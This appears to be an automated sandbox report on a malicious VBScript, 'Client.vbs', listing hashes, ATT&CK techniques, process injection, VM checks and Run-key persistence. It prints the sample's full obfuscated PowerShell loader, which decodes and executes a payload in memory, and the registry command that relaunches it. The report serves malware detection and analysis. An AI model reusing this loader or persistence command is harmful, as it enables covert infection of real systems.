e443da0d45d95a550c2f2637c8b7f3000aa9fef71840a4deff34333ad51d3c32

General

Target

Client.vbs
Size

177KB
MD5

bcfb5c05a5695508cae014e0fb254785
SHA1

6cb6d497451b32d393f7b2dc1beb2b0baf80b0d3
SHA256

e443da0d45d95a550c2f2637c8b7f3000aa9fef71840a4deff34333ad51d3c32
SHA512

8a66382d94001e0662f63553d2fdb06335c52e37994425ad980f0c87c0f9b388635b21816dfba6542d694f5f96dc53b1666424c22f5a815c326bc5046e1c08db
SSDEEP

3072:4od0wW0uWMKsiQjL7Ow0z72qo3NFOrvEFbGHTnC66xgZ7/9T/Dv5vwLI2c:bd5uWBsiQXJ0+nOQITCFOr9vSBc

Score

7^/10

persistence

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Windows\CurrentVersion\Run\Saltm = "%TORO% -w 1 $Disordi=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Netvrke;%TORO% ($Disordi)"	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1124 powershell.exe
1780 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1124 set thread context of 1780 1124 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1124 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1124 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1124 powershell.exe

pid	process
1124	powershell.exe
1780	ieinstal.exe

description	pid	process	target process
PID 1124 set thread context of 1780	1124	powershell.exe	ieinstal.exe

pid	process
1124	powershell.exe

pid	process
1124	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1124	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 532 wrote to memory of 1124	532	WScript.exe	powershell.exe
PID 532 wrote to memory of 1124	532	WScript.exe	powershell.exe
PID 532 wrote to memory of 1124	532	WScript.exe	powershell.exe
PID 532 wrote to memory of 1124	532	WScript.exe	powershell.exe
PID 1124 wrote to memory of 336	1124	powershell.exe	csc.exe
PID 1124 wrote to memory of 336	1124	powershell.exe	csc.exe
PID 1124 wrote to memory of 336	1124	powershell.exe	csc.exe
PID 1124 wrote to memory of 336	1124	powershell.exe	csc.exe
PID 336 wrote to memory of 580	336	csc.exe	cvtres.exe
PID 336 wrote to memory of 580	336	csc.exe	cvtres.exe
PID 336 wrote to memory of 580	336	csc.exe	cvtres.exe
PID 336 wrote to memory of 580	336	csc.exe	cvtres.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe
PID 1124 wrote to memory of 1780	1124	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Client.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Derea = """StdATildApodGel-CraTLymyDompSyveAkt Shr-tilTCrayLogpFiseForDCloeSnifGyniFronTeliSkutSlgiMisoilsnReo Epo'FlauPresByoiUninFingUnp RedSGnoyPresEuptFedeudbmHea;ResuSelsBoliNatnAntgLej MobSBrayFissDabtindeafvmflo.KarROpsuKamnAbotMdeihypmPoreKod.ButIWinnsygtMareTanrPuboHalpBraSUdfeLetrNorvPlaikrecUnseSkesSem;asepSkyuBlabSmklRefiCuscSne StasDomtFacaNartTariBracsme MafcdemlParaIdksSrbsPri SdeTWourOplaMetcMonhTeleYojaBiltVreiVra1Dus Aut{Cin[OveDSellSamlFloIHekmSanpFluooxirUnltGyn(Kai`"""SnowElgiEacnMoomEydmCer.gardHewlPollNol`"""Ele)Frn]PorpKuruBydbTrolsekiPercPla NicsScltAaraDretCheiInfcRee UnbeAutxSuptmvheStirUndnTil WamiResnSertCit GummAnuiOzodSlsiJelOVanuAdrtAudRUndesposPuseAfftRes(PorilornMw tPrv NosHOrnahjtmHusaDin)Tal;dis[PenDLislParlAscINepmUnspratoPibrDemtToh(Ady`"""NonkUrgeFolrlasnHeteBeslMaq3Sla2Spa`"""Kan)Fod]DispUveuPenbBorlcasiParcSki EsksRritSamaRaatCurigrfcMis PaneTraxBastTroeInvrPyrnRip PuriPetnRmetFra AutSGrueBertPreULinnStrhPlaaMuhnDisdLanlCureUnrdWilEWasxAlccUdmeHeapOldtAnsiUreoInsnUroFSpriNeilspitSyneRenrBuk(knaiAabnViotIdr JamIDesnOvedFonbArnoOcc)Kir;Rif[LodDcrelDislUngIRasmPripLinoSpyrSamtPav(Amu`"""AllkRefecherPlenKaseDoclLat3Sky2Han`"""Sol)Sup]RkepLabuSchbFurlTitiTwicfin PlesNdutPlaaGentIntiNoncTil FrieDalxStrtcapeChlrTednPla PeniEvonAmbtCed PlaGBasePestEuhTHaviFiacOplkArcCcunoshauRhonKystLiq(Sta)Dyk;Phr[wayDTillHemlTreIGrumConpElioImprSkotHle(Bom`"""CoouMacsSkreDrirFre3Syn2Ung`"""Stt)Grs]DerpPreuKombBrolBuniRodcAbr IncsHngtLimaOvetpodiGalcAnd SkreBjlxKortPryeEftrvannDis SiliLannpaptUdd LeuIHusnspesHoeeKlvrDistDelMSubeZarnIntuTerIYoktTreeSpemSte(SemiExenBartSub AleDSpliTyrsObecTiloSocrMed,ImpiSinnEnmtEss SubfAntePrarAkt,MariIndnSpatPro CoeSDenuShacKla,AneiNonnStatPhy JarAmejrSlooImmmMedaCub)Fis;Gim[ModDPerlbejlVddIAusmHyppDenoSterGhotFas(Muc`"""GuduDissLiceLoarDra3Udr2Per.FjldTamlSkilGal`"""Moz)Apo]GrapHypuBaubAfslNapiChacLre HebsMentAusaSamtTeoiAfvcTea LigeTekxSaltTraeUverRounWid UniIBognSydtUnpPGartEksrFod OmnCAptasuplKatlDatWHaliHepnRygdColoSemwNonPSterRewoGarcUbeWNub(tobIHjenKomtbarPMagtAbsrPil StrPThrrPauoNarsRibeesslPliyEmi5Unm,antianinFlatTra PenPReirRekoUstsrepeEndlNasySan6Cou,PriiCounTiltUdl TigPIrrrGldoRemsSereMytlMonyBer7Hug,MaciblonBistSls elePVesrStooShisGaleReclRidySpu8She,EsciGoonFrotIvy ExgPBoorStioUnrsproeAnslForyUnd9Mez)for;Hip[freDUnslFillYelIDatmPlapBetobesrpretSer(Non`"""TrikendeMetrkodnSmaeBrulFod3Dag2Can`"""Sou)Ind]GrapSkeuSocbErslSiliMascUds VissStetSlaaProtSh iPoscSka TrieUntxPretUdgeThurSaynAnf MosiZoonDistEne OveCleirUdbeUnhaPoltouteAmiDSkiiBehrHypeVolcVistOpsoFrorForyBul(VeniUrinTaftWak CraMTilaTmmnBondMarrOil,ErriPernSittEmu SlaFTerrMamaStovCatrSirsDyn)Ste;Tje[SemDYvelAdalHypIBalmPalpArboDalrSertFli(Tre`"""CalkNodeDihrFalnLyreAablLnm3Ing2Und`"""Ste)Sug]DagpOveuKaibLanlOutihalcFej VissUnqtBrlaDoutfoliCoccApp frieQuaxCartStoeHobrSkunLum RepiBehnPoltNee EmpMKedoLitvOmveShiFFraiWerlMazeTerESkixgen(IroiFionHartjin ConCDefhHypoRadnDisdDiprCon,ForiFranFortPli NonBborahypgImmlJudyLib,BadiPsenGyrtAri UnrKPrioRntmSil)und;Vaa[NavDShrlElelColIPolmJerpStroGrnrFantEmb(Lun`"""ExowCapiSnanPromBromAfs.KondUltlDenlMer`"""Vit)For]lftpThouAfvbTunlSuliBalcOce UnasAnttAmtaTrotConiSupcIde MiseAmbxFyntKlueForrrdvnSmi ProiRulnmertOps RetmDolihaexLooeSenrNilCKoglstaoRhysVekehem(FamiunpnMettTox udsSKeroPolnCeleKoo)Bje;Ano[TryDBiglWralVidIPhomnovpleaoBrerElytCac(Pla`"""DodiGlymGrimAgg3Con2Hom.AlldMeglSanlWea`"""Ski)Iri]KlipHiruRambplalAbbiElscQua lonsFlotSunaUndtUneiRidcfll HypeTirxUnftLeuePrerAflnFor enaiResnVovtFra JudIDramdecmEtaGIndeDritToaVMetiVddrAcotScouAlbaPhyldagKFadeRanySno(YakiLamnTratMan SitSLynvKvleDhadForkDog)Bug;Mil[DepDStalKonlAfpIElemPinpUdboPrerBiotPaa(Yar`"""LdekRoneArbrResnMonePetlPse3Ure2Bas`"""saf)Tjr]PropPlaumisbDislTreiSnecapa TsnsDebtFejaCurtBlaiEtycRam UndetanxUnetSmaeradrPranEdu ExtiAbjnKantSmr DefVMesiBonrKohtBiguKriathelrefARealTunlAbsoDeccrev(SubiCarnSprtAce ForvEve1Und,faniAuknRastFor ProvSik2Kne,OpviWignProtRef HemvMak3Spe,CadiUdlnPretMot penvBud4Sek)For;Sci[RulDKuvlJoklradIRommHirpNoroBlirSvitMon(Pns`"""PrewPoriGranBarsThipForoGenoOvelEsk.InsdMoarInevUnc`"""Glg)Non]KafpAquuTrabRedlpteiHovcLod FrosReftBaaaPentLoviTracSup LaneRykxBrutSokeHomrFornDem KatiBudnContArs ArcDAareVaglprieDamtReveXylPMrkrOmniPrenSlatProePhyrKalCPreoConnTranruteAnscStetPeriDeboAllnNon(KaliTranLyntGer VelTopgiStilUomrDat)Fje;Mon[ExhDunilGenlDelITygmBobpophoHrirBiltCri(Ren`"""PaauThrsSpreAalrBnn3und2Wan`"""Sch)Hie]PsepMamuFajbBirlColiTracTea SunsDdetMalaBedtAesiTrucEnv NedeJouxBlutskaeKasrBasnTus FrdichenUintMon encASubtFortDevaBamcCrahCroTForhhearOpieHalaTegdTipITernUdepQuouGartBro(UnsiSinnStatDis OphGPeaoskakStr,spailatnAvetmon OverFakiphogMenhban,UnbiPacnJamtBal VisTPhleTumkFis)Pre;Hjr[MorDFlolTrilPinITipmovepBogoKasrVogtAfs(For`"""ForuNubsPluePhyrPhe3Pru2Sug`"""Des)Ami]AnspUleuBinbForlPeriBescsle BansBiltTeaaradtTekiFodcTra TileBekxSyntbiteQuirRumnQua DagiDefnMistFor NecISornIgavAceaDemlSeliPubdGodaIndtTheeVirRReneTwicCostEks(OveiPahnAfstTac ReiCEksoretvOkseOve,FabiAttnUnstRen SalVJoraUdblOpkdrekeUng,RrliacenBantUdl ParIStulTruysausAssiSca)ped;Elm}Vis'Xer;Cou`$RedTBagrTilaBndcProhnejeOleaMontForiDru2Uds=Kva`$StreSecnClivIns:MaatTraeTilmEngpAkh Sar+ang Cha`"""duk\SaaGSolrAlgaskrnGna.MildPaaaLantVil`"""Sko;Acr`$AmaLLevnBotkTaxeNidrAhasNeusGuetEureSchrCel Acc=Imp KorGForepibtpri-farCcryoPopnMultCareTitnKrutViv Pri`$OplTdigrAmoaGencUnphDifemacaBlutpauiinv2Fro;Amb`$VanBFlgeUnisInvvCouoUopgAdfrChueStadVil Sel=Opb Col[KapSRepyPresChotPapeKukmMal.PreCRetoImbnflbvForeMinrKontGal]Kni:vas:TelFAccrcaroPramHowBSpuaBacscomePan6Spl4hedSFretIndrEnsiFennBragCle(ski`$MelLNamnSlakcareSuprHunsForsUnbtSameCaprBut)Tut;upd`$AkvTRivrRolaSlacudkhaareBetaNontretiDum3Rea=Egl[GavTVarrTaraHancTrihMuneUnpaDiatPhyiBru1Eve]Ash:Rom:RevVDisiMyxrTrotAnmuBasaBetlBesATellHanlbaioFaccSpo(enk0Bol,Chl1Adm0Men4Ren8Sko5Hel7til6Sar,Dis1Dyn2Tal2Pro8The8Kar,Sen6ver4Eft)Lac;Sub[PanSFamyShrsSkitbabeUdlmPro.TimRRecuFrenSkitBooiMarmInteama.AftIZannAfptDeneGifrannoBespNeuSConeWoorTohvFamiSticMoneSnosSnn.BemMAkvaAugrTiesStrhBrkaDialSiv]Pro:Mon:SinCtapoKrnpLivyBla(Uno`$appBNosekansBedvCyboTangLearBefeSpadCyp,Bnd Hus0Rec,ary Vap Cub`$CanTLobrMaraHazcReshPapeForaUdstSkiiCru3The,Ker Kvr`$OpbBSchestusSonvPreoBergPrerForeSpydLor.UnscSlooKlauNonncaltLil)Dau;Lev[HysTIndrTooaStacFlahGameBloaasctUnliflo1Gra]Uku:Ave:amiCPolaUndlabnlCerWoveiSubnRavdUdboStawSolPBalrAnioSyncuniWVis(Tmr`$AutTCharAdiaRekcUnrhLaceBacaPantMariIag3Dre,Fir Oms0Nos,Bev0Lde,Kop0Udl,Non0Ind)Taf#Kil;""";Function Tracheati4 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Prosely = $Prosely + $HS.Substring($i, 1); } $Prosely;}$symbiosens0 = Tracheati4 'CitIAmpEHeaXSco ';$symbiosens1= Tracheati4 $Derea;& ($symbiosens0) $symbiosens1;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8ytem8vr.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE66.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEE65.tmp"
4⤵
PID:580

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1780

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8ytem8vr.dll
Filesize
4KB

MD5
eec4c00d18631580fbe0556191784c85

SHA1
df77048fae57667be9d45d0bdc9157ac37863ab8

SHA256
13446b4ed65f0232e4a80b43e64af68ac688ef320f3f26178997b82479bc0f00

SHA512
e47b3070ea5b3031afdbb978ffb30af2e545a5b49b15da7d7094ce69543b4b5ab1379f04ae14160f747aa19d653db199aff829510e021a6799a7f498a600746a

Download Submit
C:\Users\Admin\AppData\Local\Temp\8ytem8vr.pdb
Filesize
7KB

MD5
db60b792bb4592c0b8b36318c7d8410f

SHA1
49618c1932a340a690c6396e8548f1447674fbc9

SHA256
7b783097bc60aaf69fcb5d5c49f95ba5f6ddd8f5cbe0a5c858937c1415fd31e8

SHA512
4056c1718caa5ad7690163731d6653fc79e6439fc7159d27382bae97eea8b98612c4005f3515673fcfdd51a6745c0d198362a6143b9d73af69f47dcbecbe5f5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gran.dat
Filesize
145KB

MD5
f8aa322d9439db5928769bbe829f3072

SHA1
965728def507bf74d495aaae6a67dec68e5a3355

SHA256
4c1a9a92d1f77a38d54b9fb583d905cbdb81362e3dc79dbec7a6477ae6463d08

SHA512
163db7c96d2739435e65367e18dca23a4c1426061d8df44a4a6b6ddcdd016a613169a6fe91786f46c7f1f3f60422a31bed1d23960418ec2d9a3b145fd87ee0ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEE66.tmp
Filesize
1KB

MD5
32c57575078dc08044038c5dc8b5728b

SHA1
691117a6f0d16c8713e5e855ca888813042740a9

SHA256
3ecda20357473f806533b777f1eca26418d24afe4e62d4256516d501fe38f34f

SHA512
62411387b81a8b3be7d01363f4568d50d8389f3bf543bd56d4100df36a8e113eea809590a50b88a019f12622f2385d384187de74b76c7361b1acd3417dcdb0b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8ytem8vr.0.cs
Filesize
1KB

MD5
d4de9651ff0de82d29338c81aa6e5885

SHA1
acec3aa0a3d399927828f4975e5193a2727c7aa8

SHA256
d70e9a0ad03b8c827666c59d74addc16a72244a73ae85fe9a10bf5ea0cf4d5d5

SHA512
458333575625e306dac458b1274d7db85ea023d84f8fc958cdc41a2b65bb5192fa6f581348eb6b20ba1db10c635bbe18d1bc80fe2e4aeccdb76d1971b753a283

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8ytem8vr.cmdline
Filesize
309B

MD5
0ef2dbfdbb5d95ef41cc16fed03eea2c

SHA1
018d8ea9c2da5866bcd0f6761c163621c2bf0a0c

SHA256
6df585dbff9372ff79e1c120260cb68d737d875a8ac949f8e0b2df294f4bcb95

SHA512
c8804be6d3af6b62a04412761635f8c0831780c446045311439cbeba198e75a3d03e488d1ffe9f52453df9c83ece9defd08be1f54ca6dfbc58b62b31fd63c34f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEE65.tmp
Filesize
652B

MD5
2aaa5cb04e8f0d30f5c99cf59a6fdd1a

SHA1
a506b9cc248a99c912febef524b391c18c182771

SHA256
a3ec5a7cc9612d7d05872e53412435ab55c257eb1f347525b8802cf29a4cbc2c

SHA512
3bac0ee80a65a4e721861050d328039a89b5739cc361eb36d4693f80912ae05abb2fd596b944323f9ee31d13924ef3d76802cec31e3fa9f599556d23208a9486

Download Submit
memory/336-58-0x0000000000000000-mapping.dmp

Download
memory/532-54-0x000007FEFC111000-0x000007FEFC113000-memory.dmp

Filesize
8KB

Download
memory/580-61-0x0000000000000000-mapping.dmp

Download
memory/1124-69-0x0000000005010000-0x0000000005110000-memory.dmp

Filesize
1024KB

Download
memory/1124-75-0x0000000077A70000-0x0000000077BF0000-memory.dmp

Filesize
1.5MB

Download
memory/1124-55-0x0000000000000000-mapping.dmp

Download
memory/1124-67-0x0000000005010000-0x0000000005110000-memory.dmp

Filesize
1024KB

Download
memory/1124-68-0x0000000074300000-0x00000000748AB000-memory.dmp

Filesize
5.7MB

Download
memory/1124-57-0x0000000074300000-0x00000000748AB000-memory.dmp

Filesize
5.7MB

Download
memory/1124-79-0x0000000077A70000-0x0000000077BF0000-memory.dmp

Filesize
1.5MB

Download
memory/1124-78-0x0000000077A70000-0x0000000077BF0000-memory.dmp

Filesize
1.5MB

Download
memory/1124-74-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/1124-56-0x00000000754F1000-0x00000000754F3000-memory.dmp

Filesize
8KB

Download
memory/1124-76-0x0000000077A70000-0x0000000077BF0000-memory.dmp

Filesize
1.5MB

Download
memory/1780-77-0x00000000001E0000-0x00000000002E0000-memory.dmp

Filesize
1024KB

Download
memory/1780-72-0x00000000001E0000-0x00000000002E0000-memory.dmp

Filesize
1024KB

Download
memory/1780-73-0x00000000001E0000-mapping.dmp

Download
memory/1780-80-0x00000000001E0000-0x00000000002E0000-memory.dmp

Filesize
1024KB

Download
memory/1780-84-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/1780-85-0x0000000077A70000-0x0000000077BF0000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads